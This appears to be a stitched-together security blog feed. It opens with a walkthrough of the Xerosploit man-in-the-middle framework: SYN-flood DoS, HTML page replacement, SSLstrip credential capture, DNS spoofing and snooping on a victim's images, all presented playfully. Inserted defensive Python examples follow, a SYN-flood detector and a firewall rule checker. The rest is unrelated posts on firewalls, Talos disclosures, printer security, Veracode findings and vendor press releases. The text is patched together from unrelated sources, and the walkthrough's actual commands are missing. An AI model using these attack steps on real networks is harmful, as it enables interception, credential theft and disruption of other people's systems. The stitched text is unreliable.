In this grid we have a list of commands for our attack. We are going for a man in the middle attack, so I will choose the scan command in my next step to scan the whole network.


This command will scan the complete network and find all devices on it.

As you can observe, it has scanned all the active hosts. There are many hosts in this network; you have to choose your target from the given result. I am going to select one for the man in the middle attack.

In the next command, it will ask which module you want to load for the man in the middle attack. Go with this command and type help.


pscan (Port Scanner)

Let’s begin with pscan, which is a port scanner; it will show you all the open ports on a network computer and retrieve the versions of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports on the victim’s network.


DOS (Denial of service)

Type “dos” to load the module; it will send a succession of TCP SYN request packets to the target’s system to make the machine unresponsive to legitimate traffic, which means it is performing a SYN flood attack.


Press ctrl + c to stop.

If you are aware of the hping tool, you can notice that this module is using the hping command to send countless SYN request packets.
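What the dos module does to the target is leave a pile of half-open connections: SYNs that never complete the handshake. The detector below is an added example (not from the article or from Xerosploit) showing how that shows up from the defender's side: it replays constructed TCP handshake records and alerts on any service whose half-open attempts dominate its completed handshakes. The hosts, ports and record shape are all constructed.

```python
"""Added example: SYN-flood detection from a constructed trace of TCP handshake records."""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

Service = Tuple[str, int]  # (destination IP, destination port)


class TcpRecord(NamedTuple):
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # "S": client SYN, "A": client's final handshake ACK


def build_sample_trace() -> List[TcpRecord]:
    """Constructed trace: 3 completed connections, then 40 half-open SYNs from spoofed sources."""
    trace: List[TcpRecord] = []
    for i in range(3):
        trace.append(TcpRecord(0.1 * i, "192.168.1.10", 40000 + i, "10.0.0.5", 80, "S"))
        trace.append(TcpRecord(0.1 * i + 0.05, "192.168.1.10", 40000 + i, "10.0.0.5", 80, "A"))
    for i in range(40):
        # TEST-NET-3 addresses stand in for spoofed sources that never answer the SYN-ACK
        trace.append(TcpRecord(1.0 + 0.01 * i, f"203.0.113.{i + 1}", 1024 + i, "10.0.0.5", 80, "S"))
    return sorted(trace)


def half_open_stats(trace: List[TcpRecord]) -> Tuple[Dict[Service, int], Dict[Service, int]]:
    """Per service: how many SYNs never completed, and how many handshakes did complete."""
    pending: Dict[Tuple[str, int, str, int], float] = {}
    completed: Dict[Service, int] = defaultdict(int)
    for rec in trace:
        key = (rec.src, rec.sport, rec.dst, rec.dport)
        if rec.flags == "S":
            pending[key] = rec.ts
        elif rec.flags == "A" and key in pending:
            del pending[key]
            completed[(rec.dst, rec.dport)] += 1
    half_open: Dict[Service, int] = defaultdict(int)
    for (_src, _sport, dst, dport) in pending:
        half_open[(dst, dport)] += 1
    return half_open, completed


def detect_syn_flood(trace: List[TcpRecord], min_half_open: int = 20,
                     min_ratio: float = 0.8) -> List[Tuple[Service, int, float]]:
    """Alert on services with many half-open connections that are mostly never completed."""
    half_open, completed = half_open_stats(trace)
    alerts = []
    for service, n_half in half_open.items():
        ratio = n_half / (n_half + completed.get(service, 0))
        if n_half >= min_half_open and ratio >= min_ratio:
            alerts.append((service, n_half, round(ratio, 2)))
    return alerts


if __name__ == "__main__":
    for (dst, dport), n, ratio in detect_syn_flood(build_sample_trace()):
        print(f"possible SYN flood against {dst}:{dport}: {n} half-open, ratio {ratio}")
```

The ratio matters as much as the count: a busy but healthy web server also has many SYNs in flight, but they complete; a flood from spoofed sources never does. In production the same logic is run over a sliding time window rather than a whole capture, and on the host side SYN cookies are the usual mitigation.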

Inject HTML (HTML Injection)

HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized or output is not encoded, and an attacker is able to inject valid HTML code into a vulnerable web page. There are many techniques that could use elements and attributes to submit HTML content.

So here we will replace the victim’s HTML page with ours. Select any page of your choice; as you will notice, I have written “You have been hacked” in my index.html page, which will replace the victim’s HTML page. Whatever page the victim tries to open, he/she will see only the replaced one.

First create a page as I have created and save it on the Desktop by the name INDEX.html.

Now run the injecthtml command to load the injecthtml module. Then type the run command to execute it and enter the path where you have saved the file.

Bravo! We have successfully replaced the page as you can see in the picture below.

Hit ctrl^c to stop the attack.


Now run the following module to sniff all the traffic of the victim, with the command:


Then enter the following command to execute that module:


Now it will ask you if you want to use SSLstrip to strip the HTTPS URLs to HTTP so that we can then catch the login credentials in clear text. So enter y.

When the victim enters the username and password, it will sniff and capture all the data.

Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see, it has successfully captured the login credentials.

Hit ctrl^c to stop the attack.


Load the dspoof module, which supplies false DNS information to all hosts the target browses, redirecting all the HTTP traffic to one specified IP.

Now type the run command to execute the module, and it will ask for the IP address where you want to redirect the traffic; here we have given our Kali Linux IP.

Now as soon as the victim opens any webpage, he/she will get the page stored in our web directory which we want to show him/her, as shown in the picture below.

Hit ctrl^c to stop the attack.


Now let’s look at another interesting module, yplay. It will play the sound of a video of your choice in the background of the victim’s browser. So first execute the yplay command followed by the run command and give the video ID you have selected.

Open your browser and choose your favourite video on YouTube which you want to play in the background of the victim’s browser. If the video has any advertisement, skip it and select the ID from the URL. Come back to xerosploit.


To execute the yplay module for the attack, type run.


Insert the YouTube video ID which you copied above from the URL in the next step.


Now no matter what the victim is doing on the laptop, if he tries to open any webpage, he/she will hear in the background the song which we want him to listen to.

Hit ctrl^c to stop the attack.


I hope all the attacks were quite interesting, but the next one is going to be amazing. Now we will replace all the images of the victim’s website with our images. For this, first execute the replace command followed by the run command. Don’t forget to give the path of the .png file which you have created as a surprise for the victim.


As the victim opens any URL, he/she will be amazed to see the replaced images of his/her website, as shown here.

Hit ctrl^c to stop the attack.


We will use the driftnet module to capture all the images the victim is viewing on the web with the following commands; it will save all captured pictures in opt/xerosploit/xedriftnet.


Once the attack is launched, we can see on our screen all the images that he is viewing on his computer. We can do much more with this tool; for example, using the move module you can shake the browser contents.

As you can observe, all the images the victim is viewing on his/her system are captured on your system successfully.

So it is needless to say that this tool, Xerosploit, is quite interesting and useful for performing so many attacks. I hope readers are going to like this.

HaPpY hAcKing!!

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Xerosploit- A Man-In-The-Middle Attack Framework appeared first on Hacking Articles.

What is a firewall? How they work and all about next-generation firewalls

A firewall is a network device that monitors packets going in and out of networks and blocks or allows them according to rules that have been set up to define what traffic is permissible and what traffic isn’t.

There are several types of firewalls that have developed over the years, becoming progressively more complex over time and taking more parameters into consideration when determining whether traffic should or should not be allowed to pass. The most modern are commonly known as next-generation firewalls (NGF) and incorporate many other technologies beyond packet filtering.

Initially placed at the boundaries between trusted and untrusted networks, firewalls are now also deployed to protect internal segments of networks, such as data centers, from other segments of organizations’ networks.
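The rule-matching the article describes is a first-match walk down an ordered list with a default action when nothing matches, and the ordering is where real rulesets go wrong. The following is an added example, not code from the article: a minimal packet-filter evaluator with CIDR matching, a constructed ruleset that protects an internal data-centre segment (the kind of internal deployment mentioned above), and an audit that reports rules shadowed by an earlier one so they can never fire. All addresses and rules are made up.

```python
"""Added example: first-match packet filtering with a default-deny policy and a
shadowed-rule audit, over a constructed ruleset and constructed packets."""
import ipaddress
from typing import List, NamedTuple, Optional, Tuple


class Packet(NamedTuple):
    src: str
    dst: str
    proto: str  # "tcp" or "udp"
    dport: int


class Rule(NamedTuple):
    action: str           # "allow" or "deny"
    src: str              # CIDR
    dst: str              # CIDR
    proto: str            # "tcp", "udp" or "any"
    dport: Optional[int]  # None = any port


def matches(rule: Rule, pkt: Packet) -> bool:
    """True when every field of the rule covers the packet."""
    return (ipaddress.ip_address(pkt.src) in ipaddress.ip_network(rule.src)
            and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(rule.dst)
            and rule.proto in ("any", pkt.proto)
            and rule.dport in (None, pkt.dport))


def evaluate(rules: List[Rule], pkt: Packet, default: str = "deny") -> Tuple[str, int]:
    """First-match semantics: returns (action, index of the rule that decided), -1 for default."""
    for i, rule in enumerate(rules):
        if matches(rule, pkt):
            return rule.action, i
    return default, -1


def shadowed_rules(rules: List[Rule]) -> List[Tuple[int, int]]:
    """Return (later, earlier) pairs where the earlier rule covers everything the later one would match."""
    found = []
    for j, later in enumerate(rules):
        for i in range(j):
            earlier = rules[i]
            if (ipaddress.ip_network(later.src).subnet_of(ipaddress.ip_network(earlier.src))
                    and ipaddress.ip_network(later.dst).subnet_of(ipaddress.ip_network(earlier.dst))
                    and earlier.proto in ("any", later.proto)
                    and earlier.dport in (None, later.dport)):
                found.append((j, i))
                break
    return found


# Constructed ruleset: 10.10.0.0/16 is the data-centre segment, 10.20.0.0/16 the office,
# 10.20.5.0/24 the admin subnet. Anything not matched falls to the default deny.
RULES: List[Rule] = [
    Rule("deny",  "0.0.0.0/0",    "10.10.0.0/16", "tcp", 3389),  # no RDP into the DC from anywhere
    Rule("allow", "10.20.0.0/16", "10.10.0.0/16", "tcp", 443),   # office may reach DC HTTPS
    Rule("allow", "10.20.5.0/24", "10.10.0.0/16", "tcp", 22),    # only admins may SSH
    Rule("allow", "10.10.0.0/16", "0.0.0.0/0",    "any", None),  # DC may initiate outbound
    Rule("allow", "10.20.5.0/24", "10.10.0.0/16", "tcp", 3389),  # intended admin RDP, but shadowed by rule 0
]


if __name__ == "__main__":
    for pkt in (Packet("10.20.5.7", "10.10.1.1", "tcp", 22),
                Packet("10.20.9.7", "10.10.1.1", "tcp", 22),
                Packet("10.20.5.7", "10.10.1.1", "tcp", 3389)):
        print(pkt, "->", evaluate(RULES, pkt))
    print("shadowed:", shadowed_rules(RULES))
```

The audit flags rule 4: the administrator meant to let the admin subnet use RDP, but the broad deny placed first consumes the packet before rule 4 is ever consulted. Moving the specific allow above the general deny fixes it, which is the general principle: specific exceptions before broad rules, then an explicit catch-all.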


Talos Vulnerability Discovery Year in Review – 2018


Cisco Talos' Vulnerability Discovery Team investigates software and operating system vulnerabilities in order to discover them before malicious threat actors. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. We strive to improve the security of our customers with detection content, which protects them while the vendor is creating, testing, and delivering the patch. These patches ultimately remove the vulnerability in question, which increases security not only for our customers but for everyone. Once these patches become available, the Talos detection content becomes public, as well. You can find all of the release information via the Talos vulnerability information page here.

Over the past several years, our research team has improved the pace at which we disclose vulnerabilities. Talos increased the number of vulnerabilities it disclosed 22 percent year-over-year, and we hope to continue to grow that number. As of Oct. 23, Cisco has updated its vendor vulnerability and discovery policy. You can read the complete details here.


Our coordinated disclosure philosophy involves working closely with vendors to address the vulnerabilities discovered by our team. Our focus is to protect customers and share this data in coordination with the software vendor. Responsible reporting involves working within the policy outlined below, while also ensuring the vendor has an opportunity to resolve the issue in a timely manner.

Timeline of actions to be taken by Cisco

In the interest of fostering coordinated vulnerability disclosure, Cisco will attempt to work with any vendor on reasonable adjustments to the above timeline if progress is being made and the 90-day default timeline is not adequate for creating a patch or other type of mitigation that addresses the vulnerability. Extenuating circumstances may result in adjustments to the disclosures and timelines when reasonably necessary.

Reporting on

The Talos Vulnerability Discovery Team released more than 200 advisories in Cisco's fiscal year 2017, resulting in 202 CVEs. In FY2018 (period ended July 31, 2018), the team increased the discovery total to 251 advisories, which led to nearly 400 CVEs. During FY2018, Talos contributed at least one vulnerability in every Adobe Reader bulletin, 20 vulnerabilities in Foxit PDF Reader, more than 90 advisories for internet-of-things (IoT) devices, eight vulnerabilities in Natus Neuroworks (EEG software), as well as various vulnerabilities in: VMWare, Nvidia Graphics Drivers, OpenOffice, Intel Graphics Drivers, Ethereum applications, and Google PDFium.

FY2018 saw a marked increase in the number of IoT vulnerabilities identified. As IoT devices increase their market share and proliferate, the associated vulnerabilities are increasing, while server exploitation continues to decline.


Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers, as well as having dedicated resources working to ensure clear communication and coordination. These developments help secure the platforms and software customers use and also help provide insight into how Talos can improve its own processes.

For vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

Removing the jam in your printer security

Printers are an important, invisible—albeit sometimes loud—component of the office. But all too often they’re filled with mystery meat icons, peculiar blinking lights, or error messages with no instruction manual to hand. No problem, you can just print at the next station!

Wrong. Printers also operate online across multiple aspects of your network. So not only are you stopped from printing that healthcare policy form you had to sign, but now you have to wonder: what else may have been intercepted?

This frustration with basic printer/hybrid device operations usually spills over into the workplace with detrimental results. When basic functionality remains a mystery, it can cause plenty of issues elsewhere. In an age of hackable online toasters and home security systems keeping people out of their homes during maintenance, it’s no wonder we forget some of the more mundane perils sitting closer to home.

But wait…printers?!

Don’t think that printers just come out of the box fully secured and ready to roll. You’re probably going to have to do some configuring, both for the printer and any devices that make use of it. Not to mention, there’s physical security to consider, too.

There are a number of ways printers can cause problems for security, and in a few cases they don’t even need to be online. Roughly 80 percent of US offices are open floor plan now, and more often than not, printers and their contents are left lying around for all to access. Something as basic as a poorly-implemented office layout could cause issues by essentially giving dozens of employees physical access to sensitive documents—and that’s just one of the perils to consider.

Outside of physical access, there are also network vulnerabilities, which an admin will need to keep on top of by applying every available patch and firmware update. In addition, accidental or purposeful leaks of scanned or printed documents are an area of concern for highly sensitive content, such as paychecks, or valuable proprietary information belonging to high-profile targets.

You may not have even considered your printer to be a security issue up to this point, but we’re not making this up. Default settings allowed this printer to potentially serve as anonymous file storage for malicious use. Elsewhere, 150,000 printers worldwide were compromised to “raise awareness of exposed printers.” Got a printer with extras like the ability to fax and turn back the clock to 1991? Whoops, a malicious fax helps take over a PC.

If this is all horribly new to you, don’t worry. We’ll lead you through some of the most common security flash points for printers and hopefully point you in the right direction. 

Physical security: for your convenience?

The whole point of a printer in the office is that anyone can use it, no matter which floor they’re located on, or even if they work from home. It’s not exactly uncommon for someone to be the sole person responsible for printing a document that somebody a few hundred miles away needs to receive. But how can you guarantee the correct recipient is standing in front of the tray when the document leaves the device? And what can you do to ensure the data is securely encrypted while it travels inside your network?

The good news is, a lot of this functionality is now built into modern printers so you can plan accordingly. Many models offer various levels of physical security to accommodate your requirements.

For example, you may want a secure lock on your paper tray if the paper inside is to be used for something business critical. Or how about a variety of watermark-style patterns appearing when unauthorised printing occurs? 

Some manufacturers offer up secure pull printing, where the documents won’t be released from the printer queue without the correct recipient presenting a PIN, or an ID card, or even a QR code. This means no sensitive documents lying around in a tray for anyone to pick up, and—bonus—it even helps the environment by not spilling wasted paper all over the place.

Manufacturers might also provide encryption for wherever the document is stored in the print queue, whether on site or in the cloud, and offer encryption for every step of the document’s journey across the network.

With these types of processes in place, you may not need to worry about additional security measures of a slightly less hi-tech variety. These may include:

  • Making staff top up ID cards with “printing funds” to cut down on paper waste and rogue prints lying all over the place
  • Installing the printer in a secure, lockable room with CCTV
  • Restricting access to certain types of paper used for money wires or billing/expense claims

If you’re stuck with a printer model that doesn’t do most or all of the above, these are the backup measures you’ll want to keep in mind. 

Locking down digital files and network authentication

You won’t find many printers lacking the ability to scan, and while locked-down print jobs are all well and good, there’s an obvious risk from paper files becoming digital ones, which could then be sent to all and sundry.

This is why some devices offer services such as locking down PDF scans, which usually involves automatically placing a password onto the file: to open it, you’ll need to have authorisation to receive the password in the first place. Others will even encrypt the scan, adding to a general overall sense of “This probably won’t end up on eBay.” If you need a device to allow some forms of protocol but deny others, or operate within certain network security policies, there are some that can potentially do that too (browse to Section 3).

At the top end of printing hardware, the devices can do everything from ensuring BIOS integrity and whitelisting to running real-time intrusion protection. This is quite a way off from me feeling reasonably accomplished when freeing up my tenth paper jam of the day, but the increased complexity in device security is definitely worth it for organisations in need of paper trails, auditing, and locking down every last inch of their potential attack surface.

Memory retention: all in the mind

Modern printers tend to have a bit of storage space rattling around in their plastic casing, alongside support for USB sticks and memory cards. The good news is, the bulk of it is temporary and is supposed to vanish in a puff of smoke (hopefully not literal smoke, or you have a whole new set of problems to worry about) when you unplug the device.

Even so, if you’re going to dispose of a printer, you’ll want to make sure you’ve done a few things. First: remove all external storage such as USB sticks and memory cards. After that, check the manual and see exactly what kind of storage is included in the hardware and how you wipe it. The chances of anyone coming across your old printer and trying to reconstruct or extract content from it are extremely remote, so this is an absolute last step.

10 percent ink remaining

There’s a lot to think about where printer security is concerned, along with a few special considerations. The near endless stream of people having to use a handful of devices across an organisation on a daily basis is unique, and presents additional worries where social engineering and insider threats are concerned. Some of the more rock solid security solutions for printers can be rather expensive, and not everyone has a budget to accommodate those kinds of purchasing decisions.

Having said that, even if you can’t drag the latest and greatest technology into the office, you can certainly come up with a few Plan B’s like some of those listed up above. Once you realise how vulnerable an insecure printer on the network can be, something is most definitely better than nothing.

The post Removing the jam in your printer security appeared first on Malwarebytes Labs.

State of Software Security Volume 9: Top 5 Takeaways for CISOs

We’ve just released the 9th volume of our State of Software Security report and, as always, it’s a treasure trove of valuable security insights. This year’s report analyzes our scans of more than 2 trillion lines of code, all performed over a 12-month period between April 1, 2017 and April 30, 2018. The data reveals a clear picture of both the security of code organizations are producing today, plus how organizations are working to lower their risk from software vulnerabilities. There are many significant and actionable takeaways, but we’ve pulled out what we consider the top 5 for security professionals.

1. Most code is still rife with vulnerabilities

More than 85 percent of all applications have at least one vulnerability in them; more than 13 percent of applications have at least one very high severity flaw. Clearly, we’ve got work to do. Most organizations are leaving themselves open to attack, and we need to focus on and keep at the application security problem.

2. The usual suspects continue to plague code security

We continue to see the same vulnerabilities pop up in code year after year. The majority of applications this year suffered from information leakage, cryptographic problems, poor code quality, and CRLF Injection. Other heavy-hitters also showed up in statistically significant populations of software. For example, we discovered highly exploitable Cross-Site Scripting flaws in nearly 49 percent of applications, and SQL injection appeared nearly as much as ever, showing up in almost 28 percent of tested software.

Why do these same vulnerabilities continue to emerge year in and year out? Most likely several factors are coming into play, but developer education clearly plays a big role. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey, and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.

3. It’s taking organizations a long time to address most of their flaws

Finding flaws is one thing; fixing them is another. The true measure of AppSec success is the percentage of found flaws you are remediating or mitigating. This year, we took a detailed look at our data surrounding fix rates, and unearthed some troubling, and some promising, findings.

One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven't even made it halfway, closing only a little more than 45 percent of all flaws. Overall, one in four vulnerabilities remain open well over a year after first discovery.

Why does that slow fix rate matter? Because cyberattackers move fast. If you’ve discovered a flaw, chances are, the bad guys have too. And the time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. A big window between find and fix leaves a big security risk.

4. The volume of vulnerabilities means prioritization is king

Clearly, most code contains a significant number of security-related defects. And also clearly, fixing those defects is not a simple or quick task. Therefore, prioritization rules in application security today. And this year’s data shows that, although organizations are prioritizing their flaws, they aren’t always considering all the important variables. Most are prioritizing by severity of flaw, but not considering criticality or exploitability.

This is a big deal when you consider that a low severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit. Or a low severity credentials management flaw, which might not be considered very dangerous, could hand the attackers the keys to an account that could be used to attack more serious flaws elsewhere in the software.

The bottom line is that organizations need to start thinking more critically about the factors that impact what they fix first.

5. DevSecOps practices are moving the needle on AppSec

In the good news department, this year’s data shows that customers taking advantage of DevSecOps’ continuous software delivery are closing their vulnerabilities more quickly than the typical organization.

What’s the connection? It stems from the focus on incrementalism in DevOps, which focuses heavily on deploying small, frequent software builds. Doing it this way makes it easier to deliver gradual improvements to all aspects of the application. When organizations embrace DevSecOps, they embed security checks into those ongoing builds, folding in continuous improvement of the application's security posture alongside feature improvement.

Over the past three years, we've examined scanning frequency as a bellwether for the prevalence of DevSecOps adoption in our customer base. Our hypothesis is that the more frequently organizations are scanning their software, the more likely it is that they’re engaging in DevSecOps practices. And this year’s data shows that there is a very strong correlation between how many times in a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Organizations really start to take a bite out of risk when they increase frequency beyond that. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they're able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Get the full report

Read the full SoSS report to get all the software security insights and best practices from our scan data. This year’s report contains details on the above points, plus data and insights on specific vulnerability types, the security implications of programming language choice, which industries are more secure than others, and more.

Windows 10 Bug Let UWP Apps Access All Files Without Users’ Consent

Microsoft silently patched a bug in its Windows 10 operating system with the October 2018 update (version 1809) that allowed Microsoft Store apps with extensive file system permission to access all files on users' computers without their consent. With Windows 10, Microsoft introduced a common platform, called Universal Windows Platform (UWP), that allows apps to run on any device running

Right-to-repair smartphone ruling loosens restrictions on industrial, farm IoT

Last week, the tech press made a big deal out of a ruling by the Librarian of Congress and the U.S. Copyright Office to allow consumers to break vendors’ digital rights management (DRM) schemes in order to fix their own smartphones and digital voice assistants. According to The Washington Post, for example, the ruling — which goes into effect Oct. 28 — was a big win for consumer right-to-repair advocates. 

LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations

ScoutPrime™ Capability Delivers Continuous Monitoring and Real-Time Discovery of Elevated Breach Risks, Helping Decision-Makers Take Action and Manage Their Expanded Cyber Attack Surface


RESTON, VA, October 30, 2018 – LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced the general availability of its advanced Third Party Risk Monitoring offering. Built on the powerful ScoutPrime platform, the LookingGlass subscription service offering leverages the industry’s most comprehensive threat data along with a team of expert security and intelligence analysts to mitigate risks, provide continuous visibility into potential vendor exposure, and significantly reduce time to action with negligible false positives.

Beyond the digitized walls of every company is a world of vendors, suppliers, providers, and subsidiaries, all connected to a company’s network or data and each with the potential access to publicly expose customer information, intellectual property, or heavily regulated data. Without continuous insight into these broader networks and data relationships, businesses risk leaving an enormous portion of their attack surface unmonitored and unchecked, undermining their ability to pinpoint or remediate third party security weaknesses and avoid costly data breaches. And while more than 60 percent of companies admit they know where third party risks are most likely to arise, they acknowledge they struggle to detect them.[1]

The LookingGlass Third Party Risk Monitoring service delivers more than static scorecards or access to infrequently updated databases. Using LookingGlass’ unique global Internet topology, the service quickly identifies third party network elements and assets to deliver 24x7x365 real-time notifications of compromises, vulnerabilities, and network breaches. LookingGlass’ experienced security analysts then review identified cyber threats for relevance, minimizing the likelihood of false positives. Designed for flexibility and scale, the service lets customers monitor up to 5,000 third parties across over a dozen unique categories of cyber risk, obtaining a comprehensive view into vulnerabilities, breaches, open ports, misconfigured certifications and other evidence of a potential system risk or compromise. Users can also add, delete, or query any vendor at any time and, with built-in reporting, can collect and report metrics to company leaders to promote security visibility across the organization, all at an effective price point.

“When it comes to risk, companies have more than just their own perimeters to consider. Every new or existing vendor increases the possibility for exposure that could lead to a breach and impact revenue, brand, and reputation,” said Eric Olson, senior vice president of product at LookingGlass Cyber Solutions. “Changing regulations that require organizations to demonstrate effective identification and management of third party relationships and associated cyber risk add even more layers of complexity to the already time-consuming task of keeping networks secure from a constant barrage of evolving inbound threats. Our Third Party Risk Monitoring service empowers security teams to effectively manage their company’s security posture by delivering the efficient, reliable analysis essential to making strategic, proactive risk management decisions.”

The LookingGlass Third Party Risk Monitoring service can be delivered as a shared or hosted service via LookingGlass or select partners in the company’s worldwide Cyber Guardian Network™. It includes round-the-clock support along with on-boarding and provisioning. In addition to continuous monitoring of third parties, it also performs perpetual scanning of the surface, social, deep, and dark web for both structured and unstructured data, including phishing activity, compromised account credentials, and vulnerabilities in vendor products.

For more information on the LookingGlass Third Party Risk Monitoring Managed Service or to schedule a demo, please visit:


About LookingGlass

LookingGlass Cyber Solutions delivers unified threat protection against sophisticated cyber attacks to global enterprises and government agencies by operationalizing threat intelligence across its end-to-end portfolio. Scalable threat intelligence platforms and network-based threat response products consume our machine-readable data feeds to provide comprehensive threat-driven security. Augmenting the solutions portfolio is a worldwide team of security analysts who continuously enrich our data feeds and provide customers unprecedented understanding and response capability into cyber, physical and 3rd party risks. Prioritized, relevant and timely insights enable customers to take action on threat intelligence across the different stages of the attack life cycle. Learn more at



Christy Pittman
W2 Communications for LookingGlass

[1] Third Party Risk: Exposing the Gaps. Thomson Reuters, 2016,

The post LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations appeared first on LookingGlass Cyber Solutions Inc.

Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource

Thor Foresight Enterprise, the endpoint security product previously known as Heimdal CORP, is now available in Microsoft Azure Marketplace and AppSource, the platform where customers can find new line-of-business apps for their industry.

This is a great addition to all Microsoft customers, who can now benefit from a cost-effective and modular endpoint solution that features EDR and other essential threat hunting tools.

Thor Foresight Enterprise is based on unique traffic-based malware detection capabilities that make it possible to map out the critical endpoints in the business environment.

The company has migrated its offering from Microsoft’s internal partner catalog to the cloud marketplace, which is an excellent selling tool and a great way to accelerate business growth.

The cloud marketplace can also provide more opportunities for Heimdal Security to expand its security solutions and attract even more customers across different global regions. 

Achieve proactive security and enhance your existing solution with Thor Foresight Enterprise, the Next-Gen Threat Prevention suite for your endpoints. 

Advanced malware is specially created to bypass traditional antivirus detection and can sneak through the gaps, but, with Thor Foresight Enterprise’s proactive, not just reactive approach, your endpoints and networks will remain secure. 

The proprietary DarkLayer Guard feature brings unique traffic filtering to prevent endpoint compromise, block malicious Internet traffic and eliminate the risk of data leakage.   

Using machine learning technology to adapt to evolving threats, the VectorN Detection module will block all incoming and outgoing communications to malicious servers and networks.  

With the powerful X-Ploit Resilience feature, Thor Foresight Enterprise will automatically apply available updates for software apps, eliminating security holes in third-party software. This way, the vulnerabilities commonly targeted during attacks are eliminated automatically, adding cost-effective resilience to the enterprise.

“With Heimdal Security publishing its solutions in the Microsoft AppSource and Azure Marketplace, we mark an important milestone to be replicated across the partner ecosystem, which contributes to the new era where Microsoft is increasingly becoming the channel for its partners,” said Radu Stefan, Microsoft ISV Business Development Manager for Heimdal Security.

Heimdal Security’s Thor Foresight Enterprise, winner of Anti Malware Solution of the Year at Computing Security Awards 2018, is a revolutionary approach to endpoint security.

Uniquely built to combat next-gen malware, ransomware, and other enterprise threats, it provides both the opportunity to automate vulnerability management and essential threat hunting tools like EDR, while being fully compatible with existing enterprise solutions.

For more information about Heimdal Security or to speak to our specialists about THOR Enterprise, please contact us by emailing sales (at) heimdalsecurity (dot) com or calling +45 7199 9177. 

The post Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource appeared first on Heimdal Security Blog.

Google Smart Lock on Chrome OS: 2 fast fixes and a power-user tip

Google's Smart Lock system for Chrome OS is one of those things that sounds spectacular on paper but then frequently falls flat in the real world.

You know about Smart Lock by now, right? It's something Google created to turn your Android phone into a contact-free key for your Chromebook: Anytime the phone is close to the computer, Chrome OS will automatically detect its presence — and as long as the phone is unlocked, the laptop will let you skip the usual password prompt and hop right in with just a quick click on the sign-on screen.

Biggest data breach penalties for 2018

Uber: $148 million

In 2016, ride-hailing app Uber had 600,000 driver and 57 million user accounts breached. Instead of reporting the incident, the company paid the perpetrator $100,000 to keep the hack under wraps. Those actions, however, cost the company dearly. The company was fined $148 million, the biggest data-breach payout in history, for violating state data breach notification laws.